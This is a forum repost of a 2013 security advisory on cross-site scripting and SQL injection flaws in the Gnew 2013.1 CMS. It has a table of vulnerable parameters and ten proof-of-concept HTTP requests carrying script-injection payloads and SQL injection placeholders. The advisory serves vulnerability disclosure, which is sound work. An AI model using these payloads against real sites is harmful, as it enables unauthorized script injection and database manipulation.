Jump to content
Matt

Gnew 2013.1 Cross Site Scripting / SQL Injection

Recommended Posts

Posted

Description :

Gnew 2013.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

Author : LiquidWorm

Source : Gnew 2013.1 Cross Site Scripting / SQL Injection ? Packet Storm

Code :

Gnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities


Vendor: Raoul Proença
Product web page: http://www.gnew.fr
Affected version: 2013.1

Summary: Gnew is a simple Content Management
System written with PHP language and using a
database server (MySQL, PostgreSQL or SQLite)
for storage.

Desc: Input passed via several parameters is not properly
sanitised before being returned to the user or used in SQL
queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code and HTML/script code in a
user's browser session in context of an affected site.


============================================================================================
| PARAM | TYPE | FILE |
============================================================================================
| |
| gnew_template | XSS | /users/profile.php, /articles/index.php, /admin/polls.php |
|------------------------------------------------------------------------------------------|
| category_id | XSS | /news/submit.php |
|------------------------------------------------------------------------------------------|
| news_id | XSS, SQLi | /news/send.php, /comments/add.php |
|------------------------------------------------------------------------------------------|
| post_subject | XSS | /posts/edit.php |
|------------------------------------------------------------------------------------------|
| thread_id | XSS, SQLi | /posts/edit.php |
|------------------------------------------------------------------------------------------|
| user_email | SQLi | /users/register.php, /users/password.php |
| |
============================================================================================



Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience



Advisory ID: ZSL-2013-5153
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5153.php



23.07.2013

---


#1 [xss]

GET /gnew/users/profile.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/gnew/admin/index.php
Cookie: PHPSESSID=8nta354i78d5att3l2gkh9g573; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean"><script>alert(1)</script>
Connection: keep-alive


#2 [xss]

POST /gnew/news/submit.php HTTP/1.1
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1"><script>alert(2);</script>&news_source=1&news_subject=1&news_text=1&preview=Preview&submit=Submit


#3 [xss]

POST /gnew/news/send.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

friend_email=lab@zeroscience.mk&html_email=1&news_id=572"><script>alert(3);</script>&send=Send&user_email=root@att.com&user_name=admin


#4 [xss]

POST /gnew/comments/add.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

add=Add&comment_subject=1&comment_text=1&news_id=574"><script>alert(4);</script>&preview=Preview


#5 [sqli]

POST /gnew/news/send.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

friend_email=lab@zeroscience.mk&html_email=1&news_id=572{SQL Injection}&send=Send&user_email=root@att.com&user_name=admin


#6 [xss]

POST /gnew/posts/edit.php HTTP/1.1
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=zsl"><script>alert(5);</script>&post_text=test&preview_edited=Preview&thread_id=6


#7 [xss]

POST /gnew/posts/edit.php HTTP/1.1
Content-Length: 184
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6"><script>alert(6);</script>


#8 [sqli]

POST /gnew/posts/edit.php HTTP/1.1
Host: localhost
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6{SQL Injection}


#9 [sqli]

POST /gnew/users/password.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/gnew/users/password.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

user_name=test&user_email={SQL Injection}&password=Send


#10 [sqli]

POST /gnew/users/register.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/gnew/users/password.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

user_name=test&user_email={SQL Injection}&password=Send

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...